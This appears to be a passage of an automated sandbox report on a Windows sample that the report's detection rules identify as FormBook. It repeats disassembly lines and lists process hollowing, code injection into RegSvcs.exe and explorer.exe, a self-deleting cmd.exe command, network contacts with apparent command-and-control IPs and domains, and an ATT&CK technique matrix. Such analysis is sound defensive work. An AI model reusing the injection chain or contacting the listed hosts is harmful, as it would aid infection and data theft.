Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]	3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h]	3_2_01026C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h]	3_2_01026C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h]	3_2_01026C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h]	3_2_01026C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0107740D mov eax, dword ptr fs:[00000030h]	3_2_0107740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0107740D mov eax, dword ptr fs:[00000030h]	3_2_0107740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0107740D mov eax, dword ptr fs:[00000030h]	3_2_0107740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FBD5E0 mov eax, dword ptr fs:[00000030h]	3_2_00FBD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FBD5E0 mov eax, dword ptr fs:[00000030h]	3_2_00FBD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]	3_2_00FD1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]	3_2_00FD1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]	3_2_00FD1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0103C450 mov eax, dword ptr fs:[00000030h]	3_2_0103C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0103C450 mov eax, dword ptr fs:[00000030h]	3_2_0103C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD35A1 mov eax, dword ptr fs:[00000030h]	3_2_00FD35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDFD9B mov eax, dword ptr fs:[00000030h]	3_2_00FDFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDFD9B mov eax, dword ptr fs:[00000030h]	3_2_00FDFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h]	3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h]	3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h]	3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h]	3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h]	3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h]	3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h]	3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h]	3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h]	3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FCC577 mov eax, dword ptr fs:[00000030h]	3_2_00FCC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FCC577 mov eax, dword ptr fs:[00000030h]	3_2_00FCC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FC7D50 mov eax, dword ptr fs:[00000030h]	3_2_00FC7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE3D43 mov eax, dword ptr fs:[00000030h]	3_2_00FE3D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD4D3B mov eax, dword ptr fs:[00000030h]	3_2_00FD4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD4D3B mov eax, dword ptr fs:[00000030h]	3_2_00FD4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD4D3B mov eax, dword ptr fs:[00000030h]	3_2_00FD4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAAD30 mov eax, dword ptr fs:[00000030h]	3_2_00FAAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]	3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]	3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]	3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]	3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]	3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]	3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]	3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]	3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]	3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]	3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]	3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]	3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]	3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01078CD6 mov eax, dword ptr fs:[00000030h]	3_2_01078CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01026CF0 mov eax, dword ptr fs:[00000030h]	3_2_01026CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01026CF0 mov eax, dword ptr fs:[00000030h]	3_2_01026CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01026CF0 mov eax, dword ptr fs:[00000030h]	3_2_01026CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010614FB mov eax, dword ptr fs:[00000030h]	3_2_010614FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0107070D mov eax, dword ptr fs:[00000030h]	3_2_0107070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0107070D mov eax, dword ptr fs:[00000030h]	3_2_0107070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0103FF10 mov eax, dword ptr fs:[00000030h]	3_2_0103FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0103FF10 mov eax, dword ptr fs:[00000030h]	3_2_0103FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB76E2 mov eax, dword ptr fs:[00000030h]	3_2_00FB76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD16E0 mov ecx, dword ptr fs:[00000030h]	3_2_00FD16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD36CC mov eax, dword ptr fs:[00000030h]	3_2_00FD36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE8EC7 mov eax, dword ptr fs:[00000030h]	3_2_00FE8EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01078F6A mov eax, dword ptr fs:[00000030h]	3_2_01078F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h]	3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h]	3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h]	3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h]	3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h]	3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB766D mov eax, dword ptr fs:[00000030h]	3_2_00FB766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01027794 mov eax, dword ptr fs:[00000030h]	3_2_01027794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01027794 mov eax, dword ptr fs:[00000030h]	3_2_01027794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01027794 mov eax, dword ptr fs:[00000030h]	3_2_01027794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h]	3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h]	3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h]	3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h]	3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h]	3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h]	3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAE620 mov eax, dword ptr fs:[00000030h]	3_2_00FAE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDA61C mov eax, dword ptr fs:[00000030h]	3_2_00FDA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDA61C mov eax, dword ptr fs:[00000030h]	3_2_00FDA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAC600 mov eax, dword ptr fs:[00000030h]	3_2_00FAC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAC600 mov eax, dword ptr fs:[00000030h]	3_2_00FAC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAC600 mov eax, dword ptr fs:[00000030h]	3_2_00FAC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD8E00 mov eax, dword ptr fs:[00000030h]	3_2_00FD8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE37F5 mov eax, dword ptr fs:[00000030h]	3_2_00FE37F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061608 mov eax, dword ptr fs:[00000030h]	3_2_01061608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0105FE3F mov eax, dword ptr fs:[00000030h]	3_2_0105FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106AE44 mov eax, dword ptr fs:[00000030h]	3_2_0106AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106AE44 mov eax, dword ptr fs:[00000030h]	3_2_0106AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB8794 mov eax, dword ptr fs:[00000030h]	3_2_00FB8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0103FE87 mov eax, dword ptr fs:[00000030h]	3_2_0103FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FBFF60 mov eax, dword ptr fs:[00000030h]	3_2_00FBFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01070EA5 mov eax, dword ptr fs:[00000030h]	3_2_01070EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01070EA5 mov eax, dword ptr fs:[00000030h]	3_2_01070EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01070EA5 mov eax, dword ptr fs:[00000030h]	3_2_01070EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010246A7 mov eax, dword ptr fs:[00000030h]	3_2_010246A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FBEF40 mov eax, dword ptr fs:[00000030h]	3_2_00FBEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0105FEC0 mov eax, dword ptr fs:[00000030h]	3_2_0105FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDE730 mov eax, dword ptr fs:[00000030h]	3_2_00FDE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01078ED6 mov eax, dword ptr fs:[00000030h]	3_2_01078ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA4F2E mov eax, dword ptr fs:[00000030h]	3_2_00FA4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA4F2E mov eax, dword ptr fs:[00000030h]	3_2_00FA4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FCF716 mov eax, dword ptr fs:[00000030h]	3_2_00FCF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDA70E mov eax, dword ptr fs:[00000030h]	3_2_00FDA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDA70E mov eax, dword ptr fs:[00000030h]	3_2_00FDA70E

Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\00098765123POIIU.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.217 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.maraitime.com
Source: C:\Windows\explorer.exe	Network Connect: 199.192.23.253 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 173.236.152.151 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ihdeuruim.com
Source: C:\Windows\explorer.exe	Domain query: www.embraceblm.com
Source: C:\Windows\explorer.exe	Domain query: www.ytksw.com
Source: C:\Windows\explorer.exe	Network Connect: 172.217.168.83 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.soccer-yokouchi.club
Source: C:\Windows\explorer.exe	Domain query: www.helenafinaltouch.com
Source: C:\Windows\explorer.exe	Network Connect: 45.39.20.158 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.contorig2.com
Source: C:\Windows\explorer.exe	Network Connect: 160.153.132.205 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.bogolacke.com
Source: C:\Windows\explorer.exe	Domain query: www.albanyhumanesociety.net
Source: C:\Windows\explorer.exe	Domain query: www.muldentaxi.com
Source: C:\Windows\explorer.exe	Domain query: www.gofourd.com
Source: C:\Windows\explorer.exe	Domain query: www.buraktradingltd.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.62.111 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.sandybottomsflipflops.com

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\00098765123POIIU.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\00098765123POIIU.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 3440			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 3440			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 380000

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\00098765123POIIU.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 642008	Jump to behavior

Source: C:\Users\user\Desktop\00098765123POIIU.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'			Jump to behavior

Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\00098765123POIIU.exe	Queries volume information: C:\Users\user\Desktop\00098765123POIIU.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\00098765123POIIU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection812	Masquerading1	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection812	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing3	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
